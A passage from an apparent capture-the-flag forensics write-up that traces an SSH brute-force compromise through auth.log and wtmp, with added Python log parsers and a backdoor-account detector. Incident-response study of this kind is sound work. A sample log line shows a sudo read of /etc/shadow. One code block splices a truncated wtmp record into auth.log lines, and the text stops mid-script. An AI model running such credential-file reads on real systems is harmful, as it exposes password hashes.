&lt;/h2&gt;

&lt;p&gt;To investigate a brute force attack over SSH, we’ll start by examining failed login attempts, as these won’t appear in the wtmp file. The auth.log file is relatively short at 385 lines, allowing for a manual scan to spot any anomalies. The log captures activity from March 6 within a 21-minute timeframe, from 06:18:01 to 06:41:01.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ wc -l auth.log   
385 auth.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since the auth.log format can be cumbersome to parse compared to structured formats like JSON, we’ll leverage Bash skills with commands like &lt;code&gt;cut&lt;/code&gt; and &lt;code&gt;grep&lt;/code&gt; for analysis. My approach to understanding the various services in the log involves:&lt;/p&gt;

&lt;p&gt;Extracting the service name:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Using &lt;code&gt;cut&lt;/code&gt; with a space delimiter to isolate the 6th field (e.g., &lt;code&gt;CRON[1119]:&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Piping this output into &lt;code&gt;cut&lt;/code&gt; again, splitting on &lt;code&gt;[&lt;/code&gt; to isolate just the service name (e.g., &lt;code&gt;CRON&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sorting and counting occurrences:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Piping the results into &lt;code&gt;sort | uniq -c | sort -nr&lt;/code&gt; to generate a frequency-sorted list of unique service names.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;From this, we’ll identify the most active contributors to the log, primarily SSH and CRON, along with other potentially interesting Unix commands, which we’ll investigate further.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ cat auth.log | cut -d' ' -f 6 | cut -d[ -f1 | sort | uniq -c | sort -nr  
    257 sshd  
    104 CRON  
      8 systemd-logind  
      6 sudo:  
      3 groupadd  
      2 usermod  
      2 systemd:  
      1 useradd  
      1 passwd  
      1 chfn
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To analyze SSH activity, we’ll use the command &lt;code&gt;cat auth.log | grep sshd | less&lt;/code&gt; to filter and view only SSH-related events. The logs begin with a successful root login. Shortly afterward, there is a sequence of failed login attempts from the IP address 65.2.161.68. These logs indicate attempts to log in as the user “admin,” which does not exist on the system.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:19:52 ip-172-31-35-28 sshd[1465]: AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys root SHA256:4vycLsDMzI+hyb9OP3wd18zIpyTqJmRq/QIZaLNrg8A failed, status 22  
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2  
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The failed login attempts occur between 06:31:33 and 06:31:42, suggesting the use of a brute force tool or script, as a human typist could not input attempts so quickly. By using &lt;code&gt;grep&lt;/code&gt; with the term “Failed,” we can extract the full range of failed login events.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Received disconnect from 65.2.161.68 port 46380:11: Bye Bye [preauth]  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Disconnected from invalid user admin 65.2.161.68 port 46380 [preauth]  
Mar  6 06:31:31 ip-172-31-35-28 sshd[620]: error: beginning MaxStartups throttling  
Mar  6 06:31:31 ip-172-31-35-28 sshd[620]: drop connection #10 from [65.2.161.68]:46482 on [172.31.35.28]:22 past MaxStartups  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: Invalid user admin from 65.2.161.68 port 46392  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: Invalid user admin from 65.2.161.68 port 46444  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: Invalid user admin from 65.2.161.68 port 46436  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2335]: Invalid user admin from 65.2.161.68 port 46460
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To further analyze, I’ll use &lt;code&gt;cut&lt;/code&gt; and &lt;code&gt;grep&lt;/code&gt; to create a histogram of the attempted login usernames. This involves isolating the username portion, which may either be a single word or prefixed with “invalid user.” To handle this, we’ll manipulate the string with &lt;code&gt;cut&lt;/code&gt; and reverse it to capture the data accurately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ cat auth.log | grep Failed | cut -d: -f4 | cut -d' ' -f5- | rev | cut -d' ' -f6- | rev | sort | uniq -c | sort -nr  
     12 invalid user server_adm  
     11 invalid user svc_account  
     10 invalid user admin  
      9 backup  
      6 root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This analysis reveals that the attacker attempted five different usernames and identified two valid ones.&lt;/p&gt;

&lt;p&gt;At this stage, it appears reasonable to conclude that the attacker’s IP address is 65.2.161.68.&lt;/p&gt;

&lt;p&gt;Once we determine the timeframe of the brute force attack, it’s essential to review all the logs within that period to identify any successful attempts. Previously, we noticed that a successful SSH login message began with “Accepted password for.” We’ll use &lt;code&gt;grep&lt;/code&gt; to search for that pattern.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ cat auth.log | grep Accepted   
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2  
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2  
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The search reveals four successful logins, with the second one occurring near the end of the brute force activity targeting the root user. Reviewing logs from that time shows related entries. Specifically, there’s a successful login as root followed immediately by a disconnect within the same second. The logs include multiple disconnection entries, but it’s worth noting that the connection for root occurs on port 34782, and the corresponding disconnect for that port appears 12 lines later amidst ongoing brute force attempts.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Received disconnect from 65.2.161.68 port 46698:11: Bye Bye [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Disconnected from invalid user server_adm 65.2.161.68 port 46698 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2380]: Received disconnect from 65.2.161.68 port 46710:11: Bye Bye [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2380]: Disconnected from invalid user server_adm 65.2.161.68 port 46710 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2387]: Connection closed by invalid user svc_account 65.2.161.68 port 46742 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2423]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68  user=backup  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2424]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68  user=backup  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2389]: Connection closed by invalid user svc_account 65.2.161.68 port 46744 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2391]: Connection closed by invalid user svc_account 65.2.161.68 port 46750 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Received disconnect from 65.2.161.68 port 34782:11: Bye Bye  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Disconnected from user root 65.2.161.68 port 34782  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session closed for user root  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Removed session 34.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This pattern aligns with behavior typical of brute force tools like Hydra or NetExec, which test for success or failure and log successful attempts for later use by the attacker.&lt;/p&gt;

&lt;p&gt;In this case, the account successfully brute forced was root.&lt;/p&gt;
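&lt;p&gt;The service histogram, the failed-username histogram and the “Accepted password” search above are three separate passes over the same file. As an added example (not part of the original walkthrough), the Python script below re-implements those three steps as one parser and then does the correlation a defender actually wants: which accepted logins came from a source address that also produced failed attempts. The sample lines are constructed for the example in the format of the Brutus auth.log; the host name, the two source addresses, the PIDs and the accepted-login ports are the ones reported above, the remaining values are made up. Unlike the &lt;code&gt;cut&lt;/code&gt; pipeline, the parser drops the trailing colon from &lt;code&gt;sudo:&lt;/code&gt; and &lt;code&gt;systemd:&lt;/code&gt; so they count as plain service names.&lt;/p&gt;

```python
import re
from collections import Counter

# Constructed auth.log excerpt (same syslog layout as the Brutus artifact).
# Host, source IPs and accepted-login ports are taken from the walkthrough;
# the "Failed password" lines are made up to give the histogram something to count.
SAMPLE_AUTH_LOG = """\
Mar  6 06:18:01 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:33 ip-172-31-35-28 sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:33 ip-172-31-35-28 sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:34 ip-172-31-35-28 sshd[2331]: Failed password for backup from 65.2.161.68 port 46436 ssh2
Mar  6 06:31:35 ip-172-31-35-28 sshd[2332]: Failed password for root from 65.2.161.68 port 46444 ssh2
Mar  6 06:31:36 ip-172-31-35-28 sshd[2335]: Failed password for invalid user server_adm from 65.2.161.68 port 46460 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:41 ip-172-31-35-28 sshd[2423]: Failed password for backup from 65.2.161.68 port 46520 ssh2
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts
Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
"""

# timestamp, host, service (with optional [pid]), message
LINE_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (\S+) ([^\[:]+)(?:\[(\d+)\])?: (.*)$")
# Standard OpenSSH messages; "invalid user " is present only for unknown account names.
FAILED_RE = re.compile(r"^Failed password for (invalid user )?(\S+) from (\S+) port (\d+)")
ACCEPTED_RE = re.compile(r"^Accepted (\S+) for (\S+) from (\S+) port (\d+)")


def parse_auth_log(text):
    """Split each syslog line into its fields; lines that do not fit the layout are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            ts, host, service, pid, msg = m.groups()
            events.append({"ts": ts, "host": host, "service": service, "pid": pid, "msg": msg})
    return events


def service_histogram(events):
    """Equivalent of: cut -d' ' -f6 | cut -d[ -f1 | sort | uniq -c | sort -nr"""
    return Counter(e["service"] for e in events)


def failed_logins(events):
    """One record per 'Failed password' line, with whether the account name exists locally."""
    out = []
    for e in events:
        if e["service"] != "sshd":
            continue
        m = FAILED_RE.match(e["msg"])
        if m:
            invalid, user, ip, port = m.groups()
            out.append({"ts": e["ts"], "user": user, "valid_account": invalid is None,
                        "ip": ip, "port": int(port)})
    return out


def username_histogram(failed):
    """Counts by (username, account exists?) pair, like the rev/cut histogram above."""
    return Counter((f["user"], f["valid_account"]) for f in failed)


def attempts_by_source(failed):
    """Failed attempts per source address, most active first via .most_common()."""
    return Counter(f["ip"] for f in failed)


def accepted_logins(events):
    out = []
    for e in events:
        if e["service"] == "sshd":
            m = ACCEPTED_RE.match(e["msg"])
            if m:
                method, user, ip, port = m.groups()
                out.append({"ts": e["ts"], "user": user, "ip": ip, "port": int(port), "method": method})
    return out


def successes_from_brute_force_sources(events):
    """Accepted logins whose source address also produced failed attempts: the compromised accounts."""
    noisy_sources = set(f["ip"] for f in failed_logins(events))
    return [a for a in accepted_logins(events) if a["ip"] in noisy_sources]


if __name__ == "__main__":
    events = parse_auth_log(SAMPLE_AUTH_LOG)
    print("services:")
    for service, n in service_histogram(events).most_common():
        print(f"  {n:4d} {service}")
    print("failed logins by username (account exists?):")
    for (user, valid), n in username_histogram(failed_logins(events)).most_common():
        print(f"  {n:4d} {user} valid={valid}")
    print("accepted logins from brute-force sources:")
    for a in successes_from_brute_force_sources(events):
        print(f"  {a['ts']} {a['user']} from {a['ip']} port {a['port']}")
```

&lt;p&gt;Run as-is it reports the single root login from 65.2.161.68 on port 34782 and leaves the earlier root login from 203.101.190.9 alone, which is exactly the distinction the manual review above had to make by eye. On a real file, read &lt;code&gt;/var/log/auth.log&lt;/code&gt; into &lt;code&gt;parse_auth_log&lt;/code&gt; instead of the sample string.&lt;/p&gt;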

&lt;h2&gt;
  
  
  Root Session Analysis
&lt;/h2&gt;

&lt;p&gt;The logs indicate a successful root authentication at 06:32:44. At that time, there are only three log lines, and the systemd-logind session number assigned to the root user is 37. A review of the wtmp file using &lt;code&gt;utmpdump&lt;/code&gt; reveals that the third-to-last row is a type 7 event (USER_PROCESS), where root logged in from the attacker’s IP at 06:32:45—one second after the successful authentication noted in &lt;code&gt;auth.log&lt;/code&gt;. The timestamp of this event is the answer to Task 3.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2  
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)  
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Other log types observed in &lt;code&gt;auth.log&lt;/code&gt;—besides SSH and cron—include sudo, groupadd, usermod, systemd, useradd, passwd, and chfn. To address Task 5, attention is focused on &lt;code&gt;useradd&lt;/code&gt; logs. At 06:34:18, four log entries indicate the creation of the &lt;code&gt;cyberjunkie&lt;/code&gt; user and group. Shortly afterward, the user’s password is set.&lt;/p&gt;

&lt;p&gt;Skipping over some cron activities, logs show that less than a minute later, &lt;code&gt;usermod&lt;/code&gt; is used to add &lt;code&gt;cyberjunkie&lt;/code&gt; to the sudo group. The sudo group allows users to execute any command as root using &lt;code&gt;sudo&lt;/code&gt;. Consequently, &lt;code&gt;cyberjunkie&lt;/code&gt; is the answer to Task 5.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;motasem@kali$ utmpdump wtmp   
Utmp dump of wtmp  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:17,804944+00:00]  
[5] [00601] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[6] [00601] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[5] [00618] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[6] [00618] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:33,792454+00:00]  
[7] [01284] [ts/0] [ubuntu  ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:13:58,354674+00:00]  
[8] [01284] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:15:12,956114+00:00]  
[7] [01483] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:15:40,806926+00:00]  
[8] [01404] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T12:34:34,949753+00:00]  
[7] [836798] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:33:49,408334+00:00]  
[5] [838568] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[6] [838568] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[7] [838962] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:41:11,700107+00:00]  
[8] [838896] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T10:41:46,272984+00:00]  
[7] [842171] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:54:27,775434+00:00]  
[8] [842073] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769514+00:00]  
[8] [836694] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769963+00:00]  
[1] [00000] [~~  ] [shutdown] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-02-11T11:09:18,000731+00:00]  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:15,744575+00:00]  
[5] [00464] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[6] [00464] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[5] [00505] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[6] [00505] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:29,538024+00:00]  
[7] [01583] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-03-06T06:19:55,151913+00:00]  
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]  
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,590579+00:00]  
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002  
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie  
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002  
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts  
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie  
Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information

Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'  
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
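&lt;p&gt;The useradd and usermod entries above are the whole persistence story in a handful of log lines, and they can be matched automatically. The detector below is an added example, not code from the walkthrough: it pairs every &lt;code&gt;useradd&lt;/code&gt; “new user” record with any later &lt;code&gt;usermod&lt;/code&gt; addition of that name to a privileged group, and with the account’s first accepted SSH login. The sample is a constructed excerpt: the cyberjunkie lines are the ones shown above, while the &lt;code&gt;deploy&lt;/code&gt; account and the &lt;code&gt;PRIVILEGED_GROUPS&lt;/code&gt; set are assumptions added to show a benign group change going unflagged.&lt;/p&gt;

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt. The cyberjunkie lines are copied from the
# walkthrough; the "deploy" account lines are made up as a benign control case.
SAMPLE = """\
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
Mar  6 06:36:02 ip-172-31-35-28 useradd[2640]: new user: name=deploy, UID=1003, GID=1003, home=/home/deploy, shell=/bin/bash, from=/dev/pts
Mar  6 06:36:10 ip-172-31-35-28 usermod[2645]: add 'deploy' to group 'www-data'
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
"""

# Leading syslog timestamp and host, shared by all three patterns.
TS = r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ "
NEW_USER_RE = re.compile(TS + r"useradd\[\d+\]: new user: name=([^,]+), UID=(\d+)")
# Matches "to group 'X'" only; the parallel "to shadow group 'X'" line is not double-counted.
GROUP_ADD_RE = re.compile(TS + r"usermod\[\d+\]: add '([^']+)' to group '([^']+)'")
ACCEPTED_RE = re.compile(TS + r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port \d+")

# Assumed list: membership in any of these is root or root-equivalent on a typical Linux host.
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root", "docker", "lxd"}


def find_backdoor_accounts(text):
    """Accounts created in this log and then granted a privileged group, with their first SSH login."""
    created = {}                    # name: {"created_at", "uid"}
    privileged = defaultdict(list)  # name: [(timestamp, group), ...]
    first_login = {}                # name: (timestamp, source ip)
    for raw in text.splitlines():
        m = NEW_USER_RE.match(raw)
        if m:
            created[m.group(2)] = {"created_at": m.group(1), "uid": int(m.group(3))}
            continue
        m = GROUP_ADD_RE.match(raw)
        if m and m.group(3) in PRIVILEGED_GROUPS:
            privileged[m.group(2)].append((m.group(1), m.group(3)))
            continue
        m = ACCEPTED_RE.match(raw)
        if m and m.group(2) not in first_login:
            first_login[m.group(2)] = (m.group(1), m.group(3))

    findings = []
    for name, info in created.items():
        if name in privileged:
            findings.append({
                "user": name,
                "uid": info["uid"],
                "created_at": info["created_at"],
                "privileged_groups": [group for _, group in privileged[name]],
                "first_ssh_login": first_login.get(name),
                # MITRE technique for a locally created persistence account
                "technique": "T1136.001",
            })
    return findings


if __name__ == "__main__":
    for f in find_backdoor_accounts(SAMPLE):
        print(f"{f['user']} (uid {f['uid']}) created {f['created_at']}, "
              f"added to {f['privileged_groups']}, first SSH login {f['first_ssh_login']}, {f['technique']}")
```

&lt;p&gt;The account that never reaches a privileged group (&lt;code&gt;deploy&lt;/code&gt; in the sample) produces no finding, so the rule stays quiet for ordinary provisioning; a hit is worth an alert on its own, and the attached first-login source address gives the responder the pivot straight back to the brute-force source.&lt;/p&gt;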



&lt;p&gt;“Create Account” is a persistence technique listed in the MITRE ATT&amp;amp;CK matrix. The specific identifier for creating a local account is &lt;a href="https://attack.mitre.org/techniques/T1136/001/" rel="noopener noreferrer"&gt;T1136.001&lt;/a&gt; (Task 6).&lt;/p&gt;

&lt;p&gt;The session disconnects shortly afterward, with the total session duration recorded as 06:32:45 to 06:37:24, amounting to 279 seconds (Task 7).&lt;/p&gt;
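&lt;p&gt;The 279-second figure comes from pairing the type 7 (USER_PROCESS) record for root on pts/1 with the next type 8 (DEAD_PROCESS) record on the same terminal, and the same pairing reconstructs every session in the utmpdump output shown in the wtmp section. As an added example, not part of the original walkthrough, the script below parses utmpdump text and performs that pairing, closing any still-open sessions at a shutdown or reboot record and ignoring a logout that has no matching login (as happens when the start of the file has been rotated away). The sample is the tail of the dump reproduced above; the record layout is that of &lt;code&gt;utmpdump&lt;/code&gt; from util-linux.&lt;/p&gt;

```python
import re
from datetime import datetime

# Tail of the utmpdump output shown in the walkthrough (records copied verbatim;
# the first DEAD_PROCESS for pts/0 has no login record in this excerpt on purpose).
SAMPLE_UTMPDUMP = """\
Utmp dump of wtmp
[7] [842171] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:54:27,775434+00:00]
[8] [842073] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769514+00:00]
[8] [836694] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769963+00:00]
[1] [00000] [~~  ] [shutdown] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-02-11T11:09:18,000731+00:00]
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:15,744575+00:00]
[5] [00464] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]
[6] [00464] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]
[5] [00505] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]
[6] [00505] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:29,538024+00:00]
[7] [01583] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-03-06T06:19:55,151913+00:00]
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,590579+00:00]
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:37:35,475575+00:00]
"""

# type, pid, id, user, line, host, ip, timestamp: the eight bracketed columns utmpdump prints
RECORD_RE = re.compile(
    r"^\[(\d+)\] \[(\d+)\] \[([^\]]*)\] \[([^\]]*)\] \[([^\]]*)\] "
    r"\[([^\]]*)\] \[([^\]]*)\] \[([^\]]*)\]\s*$"
)
# utmp record types used for session reconstruction (utmp(5)).
RUN_LVL, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 1, 2, 7, 8


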